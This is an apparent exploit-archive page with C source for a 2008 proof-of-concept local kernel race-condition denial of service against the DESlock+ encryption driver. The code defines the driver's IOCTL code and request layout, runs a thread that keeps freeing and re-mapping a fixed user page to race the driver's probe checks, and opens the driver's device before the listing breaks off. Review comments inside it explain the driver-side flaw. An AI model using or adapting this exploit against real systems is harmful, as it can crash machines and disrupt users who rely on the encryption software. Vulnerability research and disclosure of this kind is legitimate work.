DESlock+
  Add date: 11/05/2008   Publishing date: 11/05/2008   Hits: 2
 

/* deslock-probe-race.c
*
* Copyright (c) 2008 by <mu-b@digit-labs.org>
*
* DESlock+ <= 3.2.7 local kernel race condition DoS POC
* by mu-b - Fri 22 Feb 2008
*
* - Tested on: DLMFENC.sys 1.0.0.28
*
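* Race condition (time-of-check/time-of-use) between the driver's calls to
* ProbeForRead/ProbeForWrite and its later use of the probed user-mode
* pointer: the probe validates the address only at the moment of the call,
* so the mapping can change before the driver dereferences it.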
*
* "Note that subsequent accesses by the driver to the user-mode
*   buffer must also be encapsulated within a try/except block;"
*  - http://msdn.microsoft.com/en-us/library/ms797108.aspx
*
* http://www.cctmark.gov.uk/CCTMAwards/DataEncryptionSystemsLtd/tabid/103/Default.aspx
* - I wonder what that says about CESG CCTM?
*
*    - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/

#include <stdio.h>
#include <stdlib.h>

#include <windows.h>

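/* I/O control code and marker value for the request.
 * NOTE(review): neither constant is used in the visible part of the
 * listing; presumably main() passes them to the driver -- confirm there. */
#define DLMFENC_IOCTL 0x0FA4204C
#define DLMFENC_FLAG  0xDEADBEEF

/* Number of pointer-sized slots that remain in a request of `a` bytes after
 * its two leading int fields.  The argument is parenthesised so that an
 * expression argument (e.g. a conditional) expands with the intended
 * precedence. */
#define ARG_SIZE(a)   (((a) - (sizeof (int) * 2)) / sizeof (void *))

/* Request buffer laid out as two ints followed by an array of pointers.
 * The array is sized from a 0x20-byte budget, so the array length depends
 * on the pointer width of the build. */
struct ioctl_req {
  int flag;                     /* presumably DLMFENC_FLAG -- confirm in main */
  int req_num;                  /* request selector; meaning not visible here */
  void *arg[ARG_SIZE(0x20)];    /* pointer arguments filling the remainder */
};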

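/*
 * hammer_thread - worker that keeps unmapping and re-mapping one user page.
 *
 * zpage: base address of the region to release on the first pass.
 *        NOTE(review): presumably allocated by main() with VirtualAlloc;
 *        that call is outside the visible part of the listing.
 *
 * Never returns.  Each pass releases the region with VirtualFree and then
 * requests 0x10000 bytes at the fixed address 0x41000000 again, so that
 * address alternates between mapped and unmapped while the thread runs.
 * If either call fails, the whole process exits with EXIT_FAILURE.
 *
 * Per the file header, this is the user-mode side of the race against the
 * driver's ProbeForRead/ProbeForWrite checks.  The defect it demonstrates is
 * on the driver side: a probe is valid only at the instant it is made, so a
 * driver must keep every later access to the user buffer inside a
 * try/except block (or work from a copy captured into kernel memory).
 *
 * NOTE(review): the thread-creation call is not visible here; if it is
 * CreateThread, the expected entry-point type is DWORD WINAPI f(LPVOID),
 * which this signature does not match -- confirm against main().
 */
void
hammer_thread (void *zpage)
{
  BOOL result;

  /* %p is the conversion that matches a void * argument; the original
     %08X expected an unsigned int, which is undefined behaviour and
     truncates the address on 64-bit builds. */
  printf ("* [child] using page @0x%p\n", zpage);

  while (1)
    {
      /* Size 0 with MEM_RELEASE frees the entire region at zpage. */
      result = VirtualFree (zpage, 0, MEM_RELEASE);
      if (!result)
        {
          fprintf (stderr, "* [child] VirtualFree failed\n");
          exit (EXIT_FAILURE);
        }

      /* Re-create the mapping at the same fixed address. */
      zpage = VirtualAlloc ((LPVOID) 0x41000000, 0x10000,
                             MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
      if (zpage == NULL)
        {
          fprintf (stderr, "* [child] VirtualAlloc failed\n");
          exit (EXIT_FAILURE);
        }
    }
}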

int
main (int argc, char **argv)
{
  struct ioctl_req req;
  HANDLE hFile, hThread;
  DWORD rlen, dThread, nTotal, nFail;
  LPVOID zpage;
  BOOL result;

  printf ("DESlock+ <= 3.2.7 local kernel race condition DoS PoC\n"
          "by: <mu-b@digit-labs.org>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");

  fflush (stdout);
  hFile = CreateFileA ("\\\\.\\DLKPFSD_Device", FILE_EXECUTE,
                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,

 
